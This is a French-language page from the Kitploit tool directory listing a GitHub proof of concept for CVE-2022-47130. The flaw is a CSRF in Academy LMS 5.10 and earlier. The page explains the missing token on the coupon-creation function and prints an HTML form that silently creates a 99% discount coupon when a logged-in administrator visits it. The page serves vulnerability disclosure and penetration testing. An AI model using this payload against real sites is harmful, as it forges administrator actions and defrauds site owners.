Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-47130 — Academy LMS <= 5.10 CSRF | Kitploit
Outils/GitHubGitHub/openxp-research/cve-2022-47130
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubopenxp-research/cve-2022-47130

CVE-2022-47130

Academy LMS <= 5.10 CSRF

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-47130

Academy LMS <= 5.10 CSRF

Description

Academy LMS est une application où les utilisateurs peuvent créer et promouvoir des cours. La fonctionnalité d'ajout d'un coupon est vulnérable aux CSRF car il n'y a pas de jeton, ce qui signifie que cette attaque ne peut être évitée.

Preuve de concept (POC)

La première étape de notre preuve de concept consiste à s'authentifier sur la plateforme en tant qu'utilisateur administrateur.

Ensuite, il suffit d'accéder à la page qui contient le code pour exploiter la vulnérabilité, et constater qu'un nouveau coupon a été créé automatiquement.

Code utilisé dans l'exploit :

root@kitploit:~
<html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="https://target.com/admin/coupons/add" method="POST">
       <input type="hidden" name="code" value="vinix" />
       <input type="hidden" name="discount&#95;percentage" value="99" />
       <input type="hidden" name="expiry&#95;date" value="12&#47;11&#47;2022" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>
Télécharger l’outil